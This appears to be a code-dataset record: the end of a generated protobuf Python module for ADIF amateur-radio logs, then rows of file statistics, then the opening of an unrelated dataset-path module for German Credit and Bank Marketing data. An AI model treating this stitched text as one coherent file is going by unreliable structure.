name='county', full_name='adif.Station.county', index=19,
number=20, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='state', full_name='adif.Station.state', index=20,
number=21, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='country', full_name='adif.Station.country', index=21,
number=22, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dxcc', full_name='adif.Station.dxcc', index=22,
number=23, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='continent', full_name='adif.Station.continent', index=23,
number=24, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='email', full_name='adif.Station.email', index=24,
number=25, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='web', full_name='adif.Station.web', index=25,
number=26, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cq_zone', full_name='adif.Station.cq_zone', index=26,
number=27, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='itu_zone', full_name='adif.Station.itu_zone', index=27,
number=28, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='darc_dok', full_name='adif.Station.darc_dok', index=28,
number=29, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='fists', full_name='adif.Station.fists', index=29,
number=30, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='fists_cc', full_name='adif.Station.fists_cc', index=30,
number=31, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='iota', full_name='adif.Station.iota', index=31,
number=32, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='iota_island_id', full_name='adif.Station.iota_island_id', index=32,
number=33, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pfx', full_name='adif.Station.pfx', index=33,
number=34, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='region', full_name='adif.Station.region', index=34,
number=35, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='skcc', full_name='adif.Station.skcc', index=35,
number=36, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sig', full_name='adif.Station.sig', index=36,
number=37, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sig_info', full_name='adif.Station.sig_info', index=37,
number=38, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sota_ref', full_name='adif.Station.sota_ref', index=38,
number=39, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ten_ten', full_name='adif.Station.ten_ten', index=39,
number=40, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='usaca_counties', full_name='adif.Station.usaca_counties', index=40,
number=41, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='uksmg', full_name='adif.Station.uksmg', index=41,
number=42, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vucc_grids', full_name='adif.Station.vucc_grids', index=42,
number=43, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1151,
serialized_end=1910,
)
# Descriptor for the adif.Propagation message.
# Generated protobuf boilerplate (see the _internal_create_key arguments and the
# @@protoc_insertion_point markers elsewhere in this module) -- do not edit the
# metadata values by hand.  The numeric type/cpp_type/label codes and the
# serialized_start/serialized_end offsets are protoc-internal; presumably the
# offsets index into the serialized .proto file descriptor -- confirm against
# regenerated output before changing.
# NOTE(review): fields nr_bursts/nr_pings carry numbers 11/12 ahead of
# sat_mode/sat_name (numbers 9/10); index reflects declaration order in the
# .proto, not field-number order.
_PROPAGATION = _descriptor.Descriptor(
  name='Propagation',
  full_name='adif.Propagation',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='propagation_mode', full_name='adif.Propagation.propagation_mode', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='a_index', full_name='adif.Propagation.a_index', index=1,
      number=2, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='k_index', full_name='adif.Propagation.k_index', index=2,
      number=3, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='solar_flux_index', full_name='adif.Propagation.solar_flux_index', index=3,
      number=4, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='ant_path', full_name='adif.Propagation.ant_path', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='force_init', full_name='adif.Propagation.force_init', index=5,
      number=6, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='max_bursts', full_name='adif.Propagation.max_bursts', index=6,
      number=7, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='meteor_shower_name', full_name='adif.Propagation.meteor_shower_name', index=7,
      number=8, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='nr_bursts', full_name='adif.Propagation.nr_bursts', index=8,
      number=11, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='nr_pings', full_name='adif.Propagation.nr_pings', index=9,
      number=12, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='sat_mode', full_name='adif.Propagation.sat_mode', index=10,
      number=9, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='sat_name', full_name='adif.Propagation.sat_name', index=11,
      number=10, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=1913,
  serialized_end=2171,
)
# Descriptor for the adif.ContestData message (contest-exchange fields: serials,
# section, class, check, precedence).  Generated protobuf boilerplate -- all
# seven fields are proto3 singular strings (type=9/cpp_type=9); do not edit the
# metadata values by hand.
_CONTESTDATA = _descriptor.Descriptor(
  name='ContestData',
  full_name='adif.ContestData',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='contest_id', full_name='adif.ContestData.contest_id', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='serial_sent', full_name='adif.ContestData.serial_sent', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='serial_received', full_name='adif.ContestData.serial_received', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='arrl_section', full_name='adif.ContestData.arrl_section', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='station_class', full_name='adif.ContestData.station_class', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='check', full_name='adif.ContestData.check', index=5,
      number=6, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='precedence', full_name='adif.ContestData.precedence', index=6,
      number=7, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=2174,
  serialized_end=2333,
)
# Descriptor for the adif.Credit message (two singular string fields: the
# credit identifier and the QSL medium it was granted/submitted through).
# Generated protobuf boilerplate -- do not edit the metadata values by hand.
_CREDIT = _descriptor.Descriptor(
  name='Credit',
  full_name='adif.Credit',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='credit', full_name='adif.Credit.credit', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='qsl_medium', full_name='adif.Credit.qsl_medium', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=2335,
  serialized_end=2379,
)
# Descriptor for the adif.Upload message.  Generated protobuf boilerplate.
# upload_date is message-typed (type=11) and upload_status enum-typed (type=14);
# their message_type/enum_type references are patched in after all descriptors
# are constructed (see the assignments near the end of this module, which bind
# upload_date to google.protobuf.Timestamp and upload_status to _UPLOADSTATUS).
_UPLOAD = _descriptor.Descriptor(
  name='Upload',
  full_name='adif.Upload',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='upload_date', full_name='adif.Upload.upload_date', index=0,
      number=1, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='upload_status', full_name='adif.Upload.upload_status', index=1,
      number=2, type=14, cpp_type=8, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=2381,
  serialized_end=2481,
)
# Descriptor for the adif.Qsl message (QSL-card bookkeeping: sent/received
# dates, statuses, routes, and a received message).  Generated protobuf
# boilerplate.  sent_date and received_date are message-typed (type=11); they
# are later bound to google.protobuf.Timestamp by the post-construction
# assignments near the end of this module.
_QSL = _descriptor.Descriptor(
  name='Qsl',
  full_name='adif.Qsl',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='sent_date', full_name='adif.Qsl.sent_date', index=0,
      number=1, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='sent_status', full_name='adif.Qsl.sent_status', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='sent_via', full_name='adif.Qsl.sent_via', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='received_date', full_name='adif.Qsl.received_date', index=3,
      number=4, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='received_status', full_name='adif.Qsl.received_status', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='received_via', full_name='adif.Qsl.received_via', index=5,
      number=6, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='received_message', full_name='adif.Qsl.received_message', index=6,
      number=7, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=2484,
  serialized_end=2699,
)
# ---------------------------------------------------------------------------
# Post-construction wiring.  Message- and enum-typed fields cannot reference
# their target descriptors at Descriptor construction time (the targets may not
# exist yet), so the generated code patches message_type / enum_type /
# containing_type in afterwards.  Order-sensitive generated boilerplate.
# ---------------------------------------------------------------------------
_ADIF.fields_by_name['header'].message_type = _HEADER
_ADIF.fields_by_name['qsos'].message_type = _QSO
_HEADER.fields_by_name['created_timestamp'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_QSO_APPDEFINEDENTRY.containing_type = _QSO
_QSO.fields_by_name['logging_station'].message_type = _STATION
_QSO.fields_by_name['contacted_station'].message_type = _STATION
_QSO.fields_by_name['propagation'].message_type = _PROPAGATION
_QSO.fields_by_name['time_on'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_QSO.fields_by_name['time_off'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_QSO.fields_by_name['contest'].message_type = _CONTESTDATA
_QSO.fields_by_name['credit_submitted'].message_type = _CREDIT
_QSO.fields_by_name['credit_granted'].message_type = _CREDIT
_QSO.fields_by_name['clublog'].message_type = _UPLOAD
_QSO.fields_by_name['hrdlog'].message_type = _UPLOAD
_QSO.fields_by_name['qrzcom'].message_type = _UPLOAD
_QSO.fields_by_name['eqsl'].message_type = _QSL
_QSO.fields_by_name['lotw'].message_type = _QSL
_QSO.fields_by_name['card'].message_type = _QSL
_QSO.fields_by_name['app_defined'].message_type = _QSO_APPDEFINEDENTRY
_UPLOAD.fields_by_name['upload_date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_UPLOAD.fields_by_name['upload_status'].enum_type = _UPLOADSTATUS
_QSL.fields_by_name['sent_date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_QSL.fields_by_name['received_date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
# Expose every top-level message/enum descriptor through the file descriptor,
# then register the complete file with the default symbol database.
DESCRIPTOR.message_types_by_name['Adif'] = _ADIF
DESCRIPTOR.message_types_by_name['Header'] = _HEADER
DESCRIPTOR.message_types_by_name['Qso'] = _QSO
DESCRIPTOR.message_types_by_name['Station'] = _STATION
DESCRIPTOR.message_types_by_name['Propagation'] = _PROPAGATION
DESCRIPTOR.message_types_by_name['ContestData'] = _CONTESTDATA
DESCRIPTOR.message_types_by_name['Credit'] = _CREDIT
DESCRIPTOR.message_types_by_name['Upload'] = _UPLOAD
DESCRIPTOR.message_types_by_name['Qsl'] = _QSL
DESCRIPTOR.enum_types_by_name['UploadStatus'] = _UPLOADSTATUS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
# ---------------------------------------------------------------------------
# Synthesize the concrete message classes from their descriptors via the
# reflection metaclass, and register each class with the symbol database so it
# can be looked up by full name.  Qso additionally carries the nested
# AppDefinedEntry class (backing its app_defined map field).
# ---------------------------------------------------------------------------
Adif = _reflection.GeneratedProtocolMessageType('Adif', (_message.Message,), {
  'DESCRIPTOR' : _ADIF,
  '__module__' : 'adif_pb2'
  # @@protoc_insertion_point(class_scope:adif.Adif)
  })
_sym_db.RegisterMessage(Adif)
Header = _reflection.GeneratedProtocolMessageType('Header', (_message.Message,), {
  'DESCRIPTOR' : _HEADER,
  '__module__' : 'adif_pb2'
  # @@protoc_insertion_point(class_scope:adif.Header)
  })
_sym_db.RegisterMessage(Header)
Qso = _reflection.GeneratedProtocolMessageType('Qso', (_message.Message,), {
  'AppDefinedEntry' : _reflection.GeneratedProtocolMessageType('AppDefinedEntry', (_message.Message,), {
    'DESCRIPTOR' : _QSO_APPDEFINEDENTRY,
    '__module__' : 'adif_pb2'
    # @@protoc_insertion_point(class_scope:adif.Qso.AppDefinedEntry)
    })
  ,
  'DESCRIPTOR' : _QSO,
  '__module__' : 'adif_pb2'
  # @@protoc_insertion_point(class_scope:adif.Qso)
  })
_sym_db.RegisterMessage(Qso)
_sym_db.RegisterMessage(Qso.AppDefinedEntry)
Station = _reflection.GeneratedProtocolMessageType('Station', (_message.Message,), {
  'DESCRIPTOR' : _STATION,
  '__module__' : 'adif_pb2'
  # @@protoc_insertion_point(class_scope:adif.Station)
  })
_sym_db.RegisterMessage(Station)
Propagation = _reflection.GeneratedProtocolMessageType('Propagation', (_message.Message,), {
  'DESCRIPTOR' : _PROPAGATION,
  '__module__' : 'adif_pb2'
  # @@protoc_insertion_point(class_scope:adif.Propagation)
  })
_sym_db.RegisterMessage(Propagation)
ContestData = _reflection.GeneratedProtocolMessageType('ContestData', (_message.Message,), {
  'DESCRIPTOR' : _CONTESTDATA,
  '__module__' : 'adif_pb2'
  # @@protoc_insertion_point(class_scope:adif.ContestData)
  })
_sym_db.RegisterMessage(ContestData)
Credit = _reflection.GeneratedProtocolMessageType('Credit', (_message.Message,), {
  'DESCRIPTOR' : _CREDIT,
  '__module__' : 'adif_pb2'
  # @@protoc_insertion_point(class_scope:adif.Credit)
  })
_sym_db.RegisterMessage(Credit)
Upload = _reflection.GeneratedProtocolMessageType('Upload', (_message.Message,), {
  'DESCRIPTOR' : _UPLOAD,
  '__module__' : 'adif_pb2'
  # @@protoc_insertion_point(class_scope:adif.Upload)
  })
_sym_db.RegisterMessage(Upload)
Qsl = _reflection.GeneratedProtocolMessageType('Qsl', (_message.Message,), {
  'DESCRIPTOR' : _QSL,
  '__module__' : 'adif_pb2'
  # @@protoc_insertion_point(class_scope:adif.Qsl)
  })
_sym_db.RegisterMessage(Qsl)
# Reset the cached _options attributes -- protoc-generated boilerplate;
# presumably so options are resolved lazily from the serialized descriptor
# rather than from eagerly-built objects (confirm against protoc output).
DESCRIPTOR._options = None
_QSO_APPDEFINEDENTRY._options = None
# @@protoc_insertion_point(module_scope)
| 51.636066
| 5,483
| 0.742571
| 8,731
| 62,996
| 5.045127
| 0.051082
| 0.064292
| 0.101364
| 0.079071
| 0.809439
| 0.734795
| 0.72685
| 0.715885
| 0.710345
| 0.697269
| 0
| 0.044138
| 0.128945
| 62,996
| 1,219
| 5,484
| 51.678425
| 0.758606
| 0.01089
| 0
| 0.712812
| 1
| 0.003439
| 0.144155
| 0.090603
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005159
| 0
| 0.005159
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d43c9f85b610e1de5ab09b60c10f3c287a9952f7
| 16,790
|
py
|
Python
|
src/pipeline/datasets/paths.py
|
guyfreund/data_drift_detection
|
80ca5eb7445b17e04f2aa98c5f6d9ac1fe6d5ac5
|
[
"MIT"
] | null | null | null |
src/pipeline/datasets/paths.py
|
guyfreund/data_drift_detection
|
80ca5eb7445b17e04f2aa98c5f6d9ac1fe6d5ac5
|
[
"MIT"
] | 1
|
2021-12-12T22:13:58.000Z
|
2021-12-17T22:49:39.000Z
|
src/pipeline/datasets/paths.py
|
guyfreund/data_drift_detection
|
80ca5eb7445b17e04f2aa98c5f6d9ac1fe6d5ac5
|
[
"MIT"
] | null | null | null |
import os

################################################################################
# Filesystem locations of every dataset artifact used by the pipeline, for the
# two datasets (German Credit, Bank Marketing): raw source files, synthesized
# "deployment" data, and pickled training/retraining splits.  All paths are
# resolved relative to this file, so they are independent of the process's
# current working directory.
################################################################################


def _here(*parts):
    """Return an absolute path built from components relative to this file's directory."""
    return os.path.abspath(os.path.join(__file__, "..", *parts))


def _generated(filename):
    """Absolute path of a synthesized (deployment) data file under data_generation/raw_files."""
    return _here("..", "data_generation", "raw_files", filename)


def _preprocessed(filename):
    """Absolute path of a preprocessing artifact under preprocessing/raw_files."""
    return _here("..", "preprocessing", "raw_files", filename)


# Stems of the retraining datasets: the sampled training-train dataset
# concatenated with the sampled deployment dataset.
_GERMAN_CREDIT_RETRAIN = "GermanCreditSampledTrainingTrainDataset_GermanCreditSampledDeploymentDataset"
_BANK_MARKETING_RETRAIN = "BankMarketingSampledTrainingTrainDataset_BankMarketingSampledDeploymentDataset"

################################################################################
# ------------------------------ GERMAN CREDIT --------------------------------#
################################################################################
# ------------------------------ RAW DATA ------------------------------#
GERMAN_CREDIT_DATASET_PATH = _here("german_credit", "german.data")
